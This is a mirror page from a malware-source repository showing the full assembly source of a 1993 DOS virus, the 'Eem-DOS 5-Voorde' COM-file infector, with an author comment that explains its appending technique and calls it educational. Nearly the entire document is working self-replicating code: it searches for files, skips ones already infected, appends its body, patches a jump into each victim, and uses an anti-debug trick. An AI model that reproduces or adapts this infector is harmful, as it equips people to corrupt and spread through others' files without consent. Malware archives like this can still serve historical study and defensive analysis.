mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-28 09:52:32 +00:00
124 lines
4.8 KiB
NASM
124 lines
4.8 KiB
NASM
; The Eem-DOS 5-Voorde Virus
|
|
;
|
|
; Smallest COM file infector which works with te folowing principe:
|
|
;
|
|
; Before:
|
|
; _____________________ ____________
|
|
; [first 3 bytes of file][rest of file]
|
|
;
|
|
; After:
|
|
; ____________ ___________________ _____________________
|
|
; [jmp to virus][rest of file][virus][first 3 bytes of file]
|
|
;
|
|
; This way the virus can restore the first 3 bytes of the file so
|
|
; the file will still work.
|
|
;
|
|
; If you want no registers to change you can add some pushes, but
|
|
; it'll make the virus much larger.....
|
|
;
|
|
; (C)1993 by [DàRkRàY] / TridenT
|
|
;
|
|
; BTW This is only a educational source, and this virus should not be
|
|
; spread, you may publish this file in it's original form.
|
|
; If you intend to spread this virus you will take all the responsibilities
|
|
; on youself so the author will not get into trubble.
|
|
; If you do not agree with this, destroy this file now.
|
|
;
|
|
; You can reach me by contacting Byte Hunter. at Hunter BBS (he's the sysop)
|
|
; +31-33-634415, and he'll get you in touch with me...
|
|
;
|
|
|
|
_CODE SEGMENT
|
|
ASSUME CS:_CODE
|
|
|
|
ORG 100h
|
|
|
|
LEN EQU THE_END - VX ; Length of this babe...
|
|
|
|
START:
|
|
DB 0E9h,0,0 ; Jmp to virus
|
|
VX:
|
|
CALL RELATIVE ;
|
|
RELATIVE: ; Calculate relative offset
|
|
POP BP ;
|
|
SUB BP,OFFSET RELATIVE ;
|
|
|
|
MOV DI,SI ; Make DI = 100h and save
|
|
PUSH DI ; it as return point.
|
|
|
|
LEA SI,[BP + OLD_BYTES] ;
|
|
MOV CL,3 ; Restore old first bytes.
|
|
REP MOVSB ;
|
|
|
|
MOV DX,SI ; Set DX to filespec.
|
|
DEC AX ; Make AX=-1
|
|
|
|
AGAIN: ADD AH,4Fh ;
|
|
INT 21h ; Search for file(s)
|
|
JNC OK_1 ; If non left exit.
|
|
RET ;
|
|
OK_1:
|
|
MOV AH,3Eh ; Close old file, also nice
|
|
INT 21h ; anti-debug trick!!!!
|
|
|
|
MOV DI,SI ; Set DI to save old bytes
|
|
SUB DI,3 ;
|
|
|
|
CALL OPEN ; Open the victim
|
|
|
|
MOV AH,3Fh ; Save first 3 bytes
|
|
CALL IO ;
|
|
|
|
CMP BYTE PTR [DI],0E9h ; Is it allready infected?
|
|
JE AGAIN ; If so, find next
|
|
|
|
MOV AX,4202h ;
|
|
XOR CX,CX ; Set pointer to end of file
|
|
CWD ;
|
|
INT 21h ;
|
|
|
|
SUB AX,3 ;
|
|
ADD DI,8 ; Set jump to virus
|
|
MOV WORD PTR DS:[DI],AX ;
|
|
|
|
MOV AH,40h ;
|
|
MOV CL,LEN ; Write virus
|
|
LEA DX,[BP + VX] ;
|
|
INT 21h ;
|
|
|
|
CALL OPEN ; Open victim again
|
|
|
|
MOV AH,40h ;
|
|
DEC DI ; Write jmp to virus
|
|
CALL IO ;
|
|
|
|
RET ; Return to DOS
|
|
|
|
IO:
|
|
MOV CL,3 ;
|
|
MOV DX,DI ; Read or write sub
|
|
INT 21h ;
|
|
RET ;
|
|
|
|
OPEN:
|
|
MOV AX,3D02h ;
|
|
MOV DX,9Eh ; Open file in PSP for
|
|
INT 21h ; reading/writing
|
|
XCHG BX,AX ;
|
|
RET ;
|
|
|
|
OLD_BYTES: NOP ;
|
|
NOP ; Old first bytes of file
|
|
RET ;
|
|
|
|
FILE_NAME: DB '*.*',0h ; Infect all files.
|
|
; (and COM files will also
|
|
; be infected....)
|
|
|
|
NEW_BYTES DB 0E9h ; Jmp to virus
|
|
|
|
THE_END: ; Bye Bye!
|
|
|
|
_CODE ENDS
|
|
END START
|